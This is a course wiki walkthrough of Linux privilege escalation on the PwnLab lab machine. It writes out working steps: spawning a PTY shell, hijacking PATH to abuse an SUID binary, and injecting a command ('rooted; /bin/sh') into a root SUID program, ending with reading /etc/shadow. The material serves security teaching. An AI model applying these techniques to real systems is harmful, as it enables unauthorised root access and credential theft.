Linux Privilege Escalation - Paiet/SEC-335 GitHub Wiki

  • Linux Priv Esc (After gaining reverse shell in PwnLab)

    • Look for low-hanging fruit
      • uname -a (Maybe an OS priv esc exploit)
        • searchsploit linux priv local
      • Look for exploits in 3-rd party software
      • Misconfigured permissions from cron jobs or scripts

  • START LAB

  • whoami

    • www-data

  • We need to change users so that we can get more access, then root access

    • Luckily we have a list of users
  ls -al /home
  drwxr-x---  2 john john 4096 Mar 17  2016 john
    drwxr-x---  2 kane kane 4096 Nov 15 14:13 kane
    drwxr-x---  2 kent kent 4096 Mar 17  2016 kent
    drwxr-x---  2 mike mike 4096 Mar 17  2016 mike


+ Some of these users look familiar (the same as the mysql users)
+ You don't think their credentials work here do ya? :)

  • Unfortunately su didn't work

    • We get this error

      su: must be run from a terminal

  • Gotta spawn a bash terminal, luckily that is quickly done with python

    python -c 'import pty;pty.spawn("/bin/bash")'

  • Prompt changes to: www-data@pwnlab:/$

    • I can now login as kent and kane, but not mike.
    • Kent's home dir has nothing of interest
    • Kane's home dir has an executable that runs as Mike. Lets check it out.
      • rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike
      • strings msgmike (nothing here)
      • ./msgmike cat: /home/mike/msg.txt: No such file or directory
      • Looks like this little script is calling "cat" without full path which will allow us to mess around with the $PATH variable to spawn a shell as Mike
        • Remember the msgmike script is running as Mike because of the SUID set, so when the script runs our version of cat, Mike's account will spawn a shell (because that's what our cat does)
      • Trying to append the $PATH variable with Kane's home dir
        • export PATH=$PATH:/home/kane
        • Run ./msgmike
        • no joy
      • Copy the full $PATH variable and then reset to /home/kane
        • echo $PATH (copy output for later use)
        • PATH=/home/kane
        • ./msgmike
        • New shell spawned
        • Reset $PATH using copied output
          • PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
          • This must be done, or no commands will work without full paths
        • Run our handy python script to spawn a bash terminal
          • python -c 'import pty;pty.spawn("/bin/bash")'
        • whoami
          • We are Mike

  • More Priv Esc: To Root and beyond

  • move into /home/mike and list all files and perms

    • 1 file of interest
      • msg2root
      • ./msg2root
      • Message for root: hi root ("hi root" is user input)
      • hi root
      • mike@pwnlab:/home/mike$
      • Permissions reveal that this script runs as root with SUID set
      • strings msg2root
      • interesting string found
        • Message for root:
        • /bin/echo %s >> /root/messages.txt
          • Looks like this script appends to a file in root's home dir
          • Maybe a command injection attack here
          • using a ; you can string commands together
            • ./msg2root
            • Message for root: rooted; /bin/sh
            • rooted; /bin/sh
            • rooted
            • # whoami
            • root

  • We now have root shell!

  • Proof

    • cd /root

  • also

    • cat /etc/shadow